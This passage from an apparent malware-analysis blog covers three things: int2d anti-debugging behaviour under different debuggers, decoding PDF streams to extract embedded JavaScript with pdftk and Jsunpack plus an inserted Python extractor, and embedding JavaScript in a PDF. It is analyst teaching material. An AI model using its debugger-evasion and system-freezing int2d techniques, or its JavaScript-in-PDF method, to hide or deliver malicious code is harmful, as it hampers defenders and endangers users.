EAX register</span></td></tr>
</tbody></table>
<br />
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">One area of particular interest is the row where the EAX register value is one and the different debugging environments are compared. Red text indicates that the “INC” instruction executed, that is, int2d did not cause a byte to be skipped. This behavior is observed only when a kernel debugger, in this case WinDbg, is attached to the system. When WinDbg is not attached and EAX is one, the int2d interrupt does cause a byte to be skipped. This is significant: the two behaviors differ, and the difference can be used to determine whether a kernel debugger is attached.</span></div>
<div style="text-align: justify;">
<span style="font-size: large;"><br />
</span></div>
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">From the figure above we can see that there is a way to identify precisely which of four configurations the system is in: a kernel debugger and a user-level debugger attached; a kernel debugger and no user-level debugger; no kernel debugger and a user-level debugger attached; and neither a kernel debugger nor a user-level debugger. Each configuration can be identified by its unique behavior.</span></div>
<div style="text-align: justify;">
<span style="font-size: large;"><br />
</span></div>
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">The configuration with no kernel debugger and no user-level debugger can be identified when EAX is equal to zero. Figure 2.10 shows that only in this setup, with EAX equal to zero, does the “int2dprint” program display no characters in the command window.</span></div>
<div style="text-align: justify;">
<span style="font-size: large;"><br />
</span></div>
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">The configuration with no kernel debugger and Immunity Debugger attached can be identified when EAX is equal to two. With EAX equal to two, this is the only setup where the output of “int2dprint” is “AAAA” for the “JZ0” command and “AAAABBBB” for the “JNZ” command. Two other configurations print the same output, but only after the WinDbg break has been resumed with “g” from the guest system.</span></div>
<div style="text-align: justify;">
<span style="font-size: large;"><br />
</span></div>
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">The third configuration of kernel debugger and no user level debugger attached can be identified when the EAX register is equal to zero. Only in this set up the “INC EAX” is executed and the resulting display is “AAAABBBB” for the “JZ0” command and “AAAA” for the “JNZ” command.</span></div>
<div style="text-align: justify;">
<span style="font-size: large;"><br />
</span></div>
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">The last configuration of kernel debugger and user level debugger can also be identified, but in two steps. When EAX is equal to zero, there is one configuration that shares the same result as the one where a kernel debugger and a user level debugger are attached to the system. The second configuration that shares the same result for “int2dprint” is where there is no kernel debugger and a user level debugger is attached. For both of these set ups the result of the program is “AAAA” for the “JZ0” command and “AAAABBBB” for the “JNZ” command. The configuration of kernel debugger and user level debugger attached can be determined by checking the EAX value of two after the EAX value of zero. If the output is not “AAAA” for “JZ0” when the EAX value is equal to two, then the configuration we have is a kernel debugger and user level debugger attached. Alternatively, process of elimination can be used since three of the four configurations can be identified directly.</span></div>
<div style="text-align: justify;">
<span style="font-size: large;"><br />
</span></div>
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">Here lies the reason the int2d instruction serves as an anti-debugging technique. An int2d interrupt can cause a program to execute differently with a debugger attached than without one. As shown above with Immunity Debugger, when EAX equals one, “AAAABBBB” is printed when a debugger is attached and “AAAA” is printed when no debugger is attached. Malware authors use this interrupt to prevent accurate analysis of their malware.</span></div>
<div style="text-align: justify;">
<span style="font-size: large;"><br />
</span></div>
<div style="text-align: justify;">
<span style="font-family: Calibri, sans-serif; line-height: 115%;">An important note to make is that int2d can be used to crash a system. As shown in <i>Figure 2.10</i>, when the EAX register is equal to zero, and the computer is in debug mode, and immunity debugger is not attached, if the int2d instruction is used then the system will freeze and require a manual reboot. Also a system can be crashed with immunity debugger attached. If the EAX register is changed to two and the int2d is executed, again the system freezes and requires a manual reboot.</span></div>
<br />
<span style="font-size: large;"><b>6. References</b></span><br />
[1] Dr. Xiang Fu, Malware Analysis Tutorial 4: Int2dh Anti-Debugging, Available at <br />
<a href="http://fumalwareanalysis.blogspot.com/2011_10_01_archive.html">http://fumalwareanalysis.blogspot.com/2011_10_01_archive.html</a><br />
<br />
<span style="font-size: large;"><b>Decode PDF and Extract Javascript</b></span> (published 2012-03-02)<br />
<span style="font-size: large;">1. Introduction</span><br />
<div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">In the previous articles we looked at how to manually create a PDF and how to embed JavaScript inside the PDF document. I will now continue to look at how to extract JavaScript and decompress a PDF in order to reverse engineer the code inside. When a PDF is created or saved, the streams inside the PDF are commonly compressed and encoded with filters such as “FlateDecode”. The stream objects in a PDF are the objects which contain the JavaScript or text which we wish to read. Many times malware authors embed their malicious code inside these JavaScript streams and it is beneficial for security professionals to extract and decompress these streams. Let us revisit the PDF example presented in the previous article <a href="http://mariomalwareanalysis.blogspot.com/2012/02/how-to-embed-javascript-into-pdf.html" target="_blank"><i>How to Embed JavaScript into PDF</i></a>. Since the PDF was manually created, the streams are in plaintext, however, we will use Adobe Acrobat 9 to save the file again and this time the streams are encoded and not readable in a file editor.</span></div><br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxZoxIrqHGxhxes7Bm-oOFUODywPeR2O6v94qxlu_ieqAGuU_aOLqLEF25qRmrK7Fc5qagZQ9NyyZyD-udYf2HYD8bX6okHhLImy1MshNyjO23h0Gopllanhg9WDNKIRQmkoBkrfEhJiKn/s1600/Figure+1-1+wOutline+crop.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="464" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhxZoxIrqHGxhxes7Bm-oOFUODywPeR2O6v94qxlu_ieqAGuU_aOLqLEF25qRmrK7Fc5qagZQ9NyyZyD-udYf2HYD8bX6okHhLImy1MshNyjO23h0Gopllanhg9WDNKIRQmkoBkrfEhJiKn/s640/Figure+1-1+wOutline+crop.PNG" width="640" /></a></div><br />
<div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Above is a partial view of the PDF we created in the previous article with the streams encoded. As you can see the PDF has been modified. More objects have automatically been added and the original streams with JavaScript are not readable. Also the first header line which tells me the PDF specification this document follows has been changed as well. Originally it was “%PDF-1.6”, now it is “%PDF-1.6”. This is due to the version of Acrobat I used which is Acrobat Pro 9. Other changes can also be found such as metadata that is now included in the document.</span></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdODgT-hc03PE2R-4XOeNK6v8EgBHXOdue509c7kQHvEWmz68pVKAxSpw1tZ0z4bgk_z46tqGef62qbEUiDaQ30gpU5KFUwLHKMPAmbtNeM4NV6275-ckIWjsNtmMKSADipiMzowDm_C_P/s1600/Figure1-2+wOutline.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="192" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdODgT-hc03PE2R-4XOeNK6v8EgBHXOdue509c7kQHvEWmz68pVKAxSpw1tZ0z4bgk_z46tqGef62qbEUiDaQ30gpU5KFUwLHKMPAmbtNeM4NV6275-ckIWjsNtmMKSADipiMzowDm_C_P/s640/Figure1-2+wOutline.PNG" width="640" /></a></div><br />
<div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The streams may be compressed with several different filters; most commonly the FlateDecode filter is used to encode a PDF. After inspection of the document we can see that this PDF has been encoded using the FlateDecode filter. There are two tools we can use to decode the PDF. The first tool is “pdftk”, available for download at <a href="http://www.pdflabs.com/tools/pdftk-the-pdf-toolkit/">http://www.pdflabs.com/tools/pdftk-the-pdf-toolkit/</a>. This program runs on Windows, Linux, Mac OS X, FreeBSD and Solaris. It has many features which allow us to manipulate a PDF, among them the ability to decompress streams and read the file in plain text. The second tool is “Jsunpack-n”. It is a powerful tool to decode and extract JavaScript from a PDF file.</span></div><br />
<span style="font-size: large;">2. PDF Toolkit</span><br />
<div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">PDF toolkit is easy to install. Download the zip file from their website and place it in a convenient location. Then add the location of the bin folder to your environment variables. This can be done by accessing the properties of your computer and clicking on the advanced tab.</span></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGfLLmmvpPdtB9io2UILlPgGjtnYFUDdfQr4ZgULGyK-dKH2WZdy7XyMpE3TRG780ZK5lC1VW9LPSWCiUPOSoYDFhYXuTmyOjZzmt-o3Cs2F-4TogPQtj9UcLiKCEbvDWd6AkGjYQOiyUT/s1600/Windows-1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhGfLLmmvpPdtB9io2UILlPgGjtnYFUDdfQr4ZgULGyK-dKH2WZdy7XyMpE3TRG780ZK5lC1VW9LPSWCiUPOSoYDFhYXuTmyOjZzmt-o3Cs2F-4TogPQtj9UcLiKCEbvDWd6AkGjYQOiyUT/s400/Windows-1.png" width="342" /></a></div><br />
<div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Click on “Environment Variables” and here we locate the "Path" variable and add the location of our bin folder for pdftk. This allows us to use pdftk from the command prompt without having to navigate to the program folder each time.</span></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6iJCze8xP8yE5aAfTIR69C2pfYK0hPG0REIJ4CUyyz2-40OqoLE1vk124vJbfoWmBHcAh5rxJB4S_YXa3zj5SD5zeWT18L-ajzkBBMDvwMiLDcYuL1dPkF2eaiogSS5u17rrp7QgWJ6Hz/s1600/Windows-2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6iJCze8xP8yE5aAfTIR69C2pfYK0hPG0REIJ4CUyyz2-40OqoLE1vk124vJbfoWmBHcAh5rxJB4S_YXa3zj5SD5zeWT18L-ajzkBBMDvwMiLDcYuL1dPkF2eaiogSS5u17rrp7QgWJ6Hz/s400/Windows-2.png" width="356" /></a></div><br />
<div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Below is the command used to decompress the PDF file. First is the call to the program pdftk. Second we list the location of the PDF we wish to decompress. Third is the parameter output. Here we list the new filename we wish to use for our decompressed file. Last we specify the parameter “uncompress” which will decode the streams in the PDF file. To view all the commands in pdftk and the accompanying examples, type the command “pdftk –help”.</span></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJrsqD0fXiXjRxcaifXZ7ON-n_er4hKbwkbxw6EYhkhle0Ru3XiRq7MsoE3rY7S2O5vvjOGbK20cGSl24RAWZ7mS6ZfZ8c3weHglBvdCBtKyRBFPj_Wc71U8ZUbyV5wrqPVtuYkGPnk8JO/s1600/Figure+1-3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="35" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhJrsqD0fXiXjRxcaifXZ7ON-n_er4hKbwkbxw6EYhkhle0Ru3XiRq7MsoE3rY7S2O5vvjOGbK20cGSl24RAWZ7mS6ZfZ8c3weHglBvdCBtKyRBFPj_Wc71U8ZUbyV5wrqPVtuYkGPnk8JO/s640/Figure+1-3.PNG" width="640" /></a></div><br />
<div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The decoded file is created and below is the file opened in the file editor notepad++. Selected parts of the code are shown below with the corresponding line number to the left.</span></div><br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE4-VL_BT3NKv3jW6i47d8zJuWUlRIDiRGgSrPkViJ8ljBxROPHOHCMpmxdouCO1SIX04krDYH_GoEv3JpKeLeh7vISSy36ch6uKQqkijGZyrZ4sZmdWSBSbJvmqmiLkAQXjZfVlNEqEog/s1600/Figure+1-7.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="384" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhE4-VL_BT3NKv3jW6i47d8zJuWUlRIDiRGgSrPkViJ8ljBxROPHOHCMpmxdouCO1SIX04krDYH_GoEv3JpKeLeh7vISSy36ch6uKQqkijGZyrZ4sZmdWSBSbJvmqmiLkAQXjZfVlNEqEog/s640/Figure+1-7.PNG" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcmx1LlKK_rvbp-puxXMZdycycS0nNpEIIN1ndHjQWOaEzAwBxuDqURK1LsecaxTp595Iy0O9rkr0ziKaKlAQw6gbeBdKtf0EP-BgBVS0nzHvnruIhMn8apFqMIzsolFgIrYmJM83BLANY/s1600/Figure+1-8.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="356" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcmx1LlKK_rvbp-puxXMZdycycS0nNpEIIN1ndHjQWOaEzAwBxuDqURK1LsecaxTp595Iy0O9rkr0ziKaKlAQw6gbeBdKtf0EP-BgBVS0nzHvnruIhMn8apFqMIzsolFgIrYmJM83BLANY/s640/Figure+1-8.PNG" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9f1o9bfWKNftgL5VOcUMzAwNQEmCH7n_fkKon7SCYnIm8zy8bzS3WRqZ-0Sd7NIqq0Wdo78kkX5RAIhTL2xdaj2dyojF2CZIrKUQuC34FlZPTvAIIK9UIwAJpQt7_4iMt2cdlpxI_XmtO/s1600/Figure+1-9.PNG" imageanchor="1" style="display: inline !important; margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="316" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg9f1o9bfWKNftgL5VOcUMzAwNQEmCH7n_fkKon7SCYnIm8zy8bzS3WRqZ-0Sd7NIqq0Wdo78kkX5RAIhTL2xdaj2dyojF2CZIrKUQuC34FlZPTvAIIK9UIwAJpQt7_4iMt2cdlpxI_XmtO/s640/Figure+1-9.PNG" width="640" /></a></div><br />
<br />
<div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">First we can see that the streams are in plain text. We can identify the object 9 which contains the JavaScript for our alert box. Something to notice is that for the xref section of the file we had previously left this part blank with only the object name. After it was encoded and decoded the offsets were automatically calculated for all the objects.</span></div><br />
<span style="font-size: large;">3. Jsunpack</span><br />
<div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The second tool we can utilize to decode and extract the JavaScript in a PDF file is Jsunpack. I tested it on Ubuntu 10.04; the latest version can be obtained by running the following command in Ubuntu:</span></div><br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;"> $ svn checkout http://jsunpack-n.googlecode.com/svn/trunk/ jsunpack-n</span><br />
<br />
<div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Follow the instructions in the INSTALL file to complete the installation. Once installed, we can use the terminal to examine a PDF file. I tested it on my previous sample PDF file and the file was decoded; however, no JavaScript was decoded. Therefore I tested it on a sample JavaScript clock file which served as a better example. The JavaScriptClock file is available at <a href="http://www.pdfscripting.com/public/47.cfm">http://www.PDFscripting.com/public/47.cfm</a>. Open the file in a file editor and it is visible that the streams are encoded.</span></div><div style="text-align: justify;"><br />
</div><div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">Below is the command to call the PDF Python script. You provide the location of the PDF file and the Python script handles the rest. For more verbose information on the file, append “-v” to the end of the command. The command below decodes the file and extracts the JavaScript embedded in the PDF to a separate file that we can examine. Jsunpack appends “.out” to the name of the new file it creates.</span></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkopRjkpHcBJHG3aqRjLJrhAHnywRlppw65NFvvD6X-jdz51nq3cxHhQh8eX2LPQfXVZ2UxV0VCWzEBXHdxL1Cpy_96e5AxqhWDEn_IH4yhuEQG6apc-fuBxTBIW-wtXDLkSKSsdtRi6Bz/s1600/Figure+1-4.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="33" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjkopRjkpHcBJHG3aqRjLJrhAHnywRlppw65NFvvD6X-jdz51nq3cxHhQh8eX2LPQfXVZ2UxV0VCWzEBXHdxL1Cpy_96e5AxqhWDEn_IH4yhuEQG6apc-fuBxTBIW-wtXDLkSKSsdtRi6Bz/s640/Figure+1-4.PNG" width="640" /></a></div><br />
<div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">“JavaScriptClock.PDF.out” contains the JavaScript and below is a partial output in gedit. We can see all the functions and declarations that were made using JavaScript. This provides a useful way to look at obfuscated PDF that may contain malicious code.</span></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU0s352MheEH46yUswT1UWhUgTcevOgt3rd3dWXsyJP6jbhk-0uRZ5m4DwJhY3OgbW98ZdH6orwKo70k4AHkZlzyrdFysaMVOK7futzQP1QIxk1gq3MR1VLSTj9WfxTwe5O8EPFFnYoWQk/s1600/Figure+1-5.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="492" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgU0s352MheEH46yUswT1UWhUgTcevOgt3rd3dWXsyJP6jbhk-0uRZ5m4DwJhY3OgbW98ZdH6orwKo70k4AHkZlzyrdFysaMVOK7futzQP1QIxk1gq3MR1VLSTj9WfxTwe5O8EPFFnYoWQk/s640/Figure+1-5.PNG" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwwS-dpq4t9j8FiPaPW7AhFT7anjWZwWFSvMcVrt8xewFzWkMc8OPqDGf5h3VF5LCoNTZonfq3FiYEnBC_YE_zBa71AXP4LnFJ8PbENHyepPOk1ZaIOvxg7ejz1YAQ_kCIyZb-C4x4G7cq/s1600/Figure+1-6+wOutline+crop.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="498" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwwS-dpq4t9j8FiPaPW7AhFT7anjWZwWFSvMcVrt8xewFzWkMc8OPqDGf5h3VF5LCoNTZonfq3FiYEnBC_YE_zBa71AXP4LnFJ8PbENHyepPOk1ZaIOvxg7ejz1YAQ_kCIyZb-C4x4G7cq/s640/Figure+1-6+wOutline+crop.PNG" width="640" /></a></div><br />
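The two steps shown in sections 2 and 3, inflating the FlateDecode streams (what the pdftk “uncompress” operation does) and pulling the JavaScript out of the /S /JavaScript actions (what Jsunpack writes to the “.out” file), can be reproduced at small scale in Python. The script below is an added example and is not code from pdftk, Jsunpack or this blog. It builds a constructed sample PDF whose object numbers and script text are invented for the illustration, handles both an inline /JS literal string and a /JS reference to a compressed stream, and is deliberately not a full PDF parser: object streams and hex strings that butt directly against “>>” are out of scope, and an indirect /Length falls back to searching for the “endstream” keyword.

```python
import re
import zlib

# Constructed sample PDF fragment (not the file from the article). Object 8 is a
# JavaScript action whose /JS refers to stream object 9, stored with /FlateDecode
# the way Acrobat saves it; object 10 carries its script inline as a literal.
_JS_IN_STREAM = b'app.alert({cMsg: "Hello from object 9", cTitle: "Test"});'
_DEFLATED = zlib.compress(_JS_IN_STREAM)
SAMPLE_PDF = b"".join([
    b"%PDF-1.6\n",
    b"1 0 obj\n<< /Type /Catalog /Pages 2 0 R /Names 6 0 R >>\nendobj\n",
    b"6 0 obj\n<< /JavaScript 7 0 R >>\nendobj\n",
    b"7 0 obj\n<< /Names [(My Code) 8 0 R (Inline) 10 0 R] >>\nendobj\n",
    b"8 0 obj\n<< /S /JavaScript /JS 9 0 R >>\nendobj\n",
    b"9 0 obj\n<< /Length " + str(len(_DEFLATED)).encode() + b" /Filter /FlateDecode >>\n",
    b"stream\n" + _DEFLATED + b"\nendstream\nendobj\n",
    b'10 0 obj\n<< /S /JavaScript /JS (app.alert({cMsg: "inline", cTitle: "T"})) >>\nendobj\n',
    b"trailer\n<< /Root 1 0 R >>\n%%EOF\n",
])

OBJ_HEADER = re.compile(rb"(\d+)\s+(\d+)\s+obj\b")


def _read_dict(data, start):
    """(bytes, end) of the balanced << ... >> at `start`; a hex string touching >> would confuse it."""
    depth, i = 0, start
    while i < len(data) - 1:
        pair = data[i:i + 2]
        depth += (pair == b"<<") - (pair == b">>")
        i += 2 if pair in (b"<<", b">>") else 1
        if depth == 0:
            return data[start:i], i
    raise ValueError("unterminated dictionary")


def _read_literal(data, start):
    """Body of the balanced ( ... ) literal string at `start`; escapes are kept as written."""
    depth, i, out = 0, start, bytearray()
    while i < len(data):
        c = data[i:i + 1]
        if c == b"\\":                       # escaped byte: copy both, never count it
            out += data[i:i + 2]
            i += 2
            continue
        depth += (c == b"(") - (c == b")")
        if depth == 0:
            return bytes(out)
        if i > start:                        # skip only the opening parenthesis
            out += c
        i += 1
    raise ValueError("unterminated literal string")


def uncompress_streams(pdf):
    """Walk every 'n g obj'; return [(num, dict_bytes, data)] where data is the inflated
    stream body, or None for objects without a stream (the pdftk 'uncompress' step)."""
    objects = []
    for m in OBJ_HEADER.finditer(pdf):
        pos = m.end()
        while pos < len(pdf) and pdf[pos:pos + 1] in b" \t\r\n":
            pos += 1
        if pdf[pos:pos + 2] != b"<<":        # only dictionary objects can own a stream
            continue
        d, end = _read_dict(pdf, pos)
        data = None
        sm = re.match(rb"\s*stream\r?\n", pdf[end:])
        if sm:
            start = end + sm.end()
            lm = re.search(rb"/Length\s+(\d+)(?=\s*(?:/|>>))", d)   # direct /Length only
            if lm:
                data = pdf[start:start + int(lm.group(1))]
            else:                            # indirect /Length: fall back to the keyword
                data = pdf[start:pdf.index(b"endstream", start)].rstrip(b"\r\n")
            if b"/FlateDecode" in d:
                data = zlib.decompress(data)
        objects.append((int(m.group(1)), d, data))
    return objects


def extract_javascript(pdf):
    """Source of every /S /JavaScript action, whether /JS is an inline literal or a
    reference to a (possibly compressed) stream: the part Jsunpack writes to .out."""
    objs = {num: (d, data) for num, d, data in uncompress_streams(pdf)}
    scripts = []
    for d, data in objs.values():
        if not re.search(rb"/S\s*/JavaScript\b", d):
            continue
        ref = re.search(rb"/JS\s+(\d+)\s+\d+\s+R\b", d)
        if ref:
            target = objs.get(int(ref.group(1)))
            if target and target[1] is not None:
                scripts.append(target[1])
        else:
            lit = re.search(rb"/JS\s*\(", d)
            if lit:
                scripts.append(_read_literal(d, lit.end() - 1))
    return scripts


if __name__ == "__main__":
    for script in extract_javascript(SAMPLE_PDF):
        print(script.decode("latin-1"))
```

Run as-is it prints the two scripts recovered from the constructed sample; to try it on a real file, read the bytes in and pass them to extract_javascript(). The only difference from the pdftk output shown above is that nothing is written back: the inflated stream bodies stay in memory, which is also where an analyst wants suspicious JavaScript, not in a second file a viewer might open.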
<span style="font-size: large;">4. Conclusion</span><br />
<div style="text-align: justify;"><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">To conclude, there are tools that exist to make it easier to manipulate and decode PDF documents. Above I have shown two tools, pdftk and Jsunpack, that are useful to decode streams in a PDF. The streams will usually contain JavaScript and unfortunately malware authors will embed JavaScript that will perform undesired functions on another user’s computer. These tools allow us to reverse engineer the code and discover whether malicious code is embedded. As shown above, Jsunpack also provides the user with all the JavaScript in a separate file, which is useful for analysis. In the next article I will explore buffer overflow attacks and vulnerabilities of PDFs and previous versions of Adobe Acrobat.</span></div><br />
<span style="font-size: large;">References</span><br />
[1] "Document Management - Portable Document Format", Available at <br />
<a href="http://www.adobe.com/devnet/pdf/pdf_reference.html">http://www.adobe.com/devnet/pdf/pdf_reference.html</a><br />
[2] Michael Ligh, "<i>Malware Analyst's Cookbook and DVD</i>", Available at<br />
<a href="http://www.amazon.com/Malware-Analysts-Cookbook-DVD-Techniques/dp/0470613033">http://www.amazon.com/Malware-Analysts-Cookbook-DVD-Techniques/dp/0470613033</a><br />
<br />
<span style="font-size: large;"><b>How to Embed JavaScript into PDF</b></span> (published 2012-02-26)<br />
<div class="MsoNormal"><span style="font-size: large;">1. Introduction</span></div><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">In this article I continue from my last post <i><a href="http://mariomalwareanalysis.blogspot.com/2012/02/how-to-manually-create-pdf.html" target="_blank">How to Manually Create a PDF</a></i>. I explain how to embed JavaScript into a PDF document and how to extract the JavaScript from a document as well. Malicious code is often embedded as JavaScript inside a PDF document and extraction of the JavaScript is a useful method to isolate and reverse engineer the code for security professionals.</span><br />
<br />
<div class="MsoNormal" style="margin-bottom: .0001pt; margin-bottom: 0in;"><span style="font-size: large;">2. AlertBox Example</span><o:p></o:p></div><span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">In the last article I explained the format for a PDF and provided a simple example that printed “Hello World!” at the top of the document. It contained only the bare essentials and we will now add on to the example and include JavaScript. Below is the code for the original example created in the last post.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdWaJ0IEJT-JoFmXr_AK4gO3hpc4hT0HdiTgEwGPdxSyKULH0ghB_5NQRqPNJDfeTEiIcr4r5Lik831-f4d3DSQrzybRcda-0ziPB2OsyoteeSItjV2Wpzm6OOQrOPzEuFgZ0CELruEo-l/s1600/Figure1-2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjdWaJ0IEJT-JoFmXr_AK4gO3hpc4hT0HdiTgEwGPdxSyKULH0ghB_5NQRqPNJDfeTEiIcr4r5Lik831-f4d3DSQrzybRcda-0ziPB2OsyoteeSItjV2Wpzm6OOQrOPzEuFgZ0CELruEo-l/s1600/Figure1-2.JPG" /></a></div><br />
<br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">In order to introduce JavaScript to the PDF we need to modify the original example and add three new objects. The first object will be an indirect object that has a reference to the JavaScript object.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-Go9nRX0YKo4xvbZ0nBc7wmeAzlkpB0LgvqTk58tJNwyLANFhAcQivSPOzSWHlBPVIThTSDfavASglT_8sD95mn_XMW8IBp9B7W_rVs-wJhc9mOvMGkTo7nuoJ9bDdZHtTORi9K1-L7aa/s1600/Figure1-2.PNG" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi-Go9nRX0YKo4xvbZ0nBc7wmeAzlkpB0LgvqTk58tJNwyLANFhAcQivSPOzSWHlBPVIThTSDfavASglT_8sD95mn_XMW8IBp9B7W_rVs-wJhc9mOvMGkTo7nuoJ9bDdZHtTORi9K1-L7aa/s1600/Figure1-2.PNG" /></a></div><br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">As you can see in the figure above, object 6 has the JavaScript tag and points to object 7. That is all we need to include for the first object. The second object will be another pointer. It will include the “/Names” tag, which allows us to name the JavaScript code we will introduce to the PDF document. As you can see we have a reference to the third object, which is object number 8. The name I give the JavaScript code I will introduce is “My Code”.</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVIsvrrWugm9sNakb7tA_bey5cmFqnquSsMEZT3kpii8SOVvLh5Oza0biqrbVblLLxhyR-QZEs53lii7oDxwH6oi64FGudCsiScm3K2gFzjc-_TjEL5EDyJcNtG4SvXxlezuJs0EnGi-n4/s1600/Figure1-3.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVIsvrrWugm9sNakb7tA_bey5cmFqnquSsMEZT3kpii8SOVvLh5Oza0biqrbVblLLxhyR-QZEs53lii7oDxwH6oi64FGudCsiScm3K2gFzjc-_TjEL5EDyJcNtG4SvXxlezuJs0EnGi-n4/s1600/Figure1-3.PNG" /></a></div><br />
<span style="font-family: Calibri, sans-serif; font-size: 11pt; line-height: 115%;">The third object I need to introduce to embed JavaScript is an object with the actual JavaScript code. In my example this is object number 8.</span><br />
<br />
